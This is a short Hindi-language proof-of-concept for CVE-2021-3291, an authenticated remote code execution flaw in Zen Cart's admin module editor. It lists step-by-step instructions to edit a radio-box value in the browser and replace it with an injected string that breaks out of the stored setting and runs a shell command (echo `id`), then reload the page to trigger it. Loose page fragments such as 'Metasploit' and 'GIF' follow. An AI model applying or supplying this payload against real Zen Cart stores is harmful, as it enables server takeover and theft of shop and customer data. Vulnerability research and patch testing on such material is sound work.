
Zen Cart के लिए प्रमाणित रिमोट कोड निष्पादन एक्सप्लॉइट, एडमिन मॉड्यूल संपादन में SQL इंजेक्शन के माध्यम से। CVE-2021-3291 के लिए प्रूफ-ऑफ-कॉन्सेप्ट।
1-) व्यवस्थापक के रूप में लॉगिन करें
2-) किसी भी मॉड्यूल का संपादन पृष्ठ खोलें
3-) किसी भी true रेडियोबॉक्स पर तत्व का निरीक्षण करें
4-) true को true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo `id`; // में बदलें
5-) अपडेट पर क्लिक करें
6-) कमांड ट्रिगर करने के लिए फिर से संपादन पृष्ठ पर जाएँ
CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291
POC
शोषण
पेज रीफ्रेश करें
ज़ूम करें

Metasploit

GIF
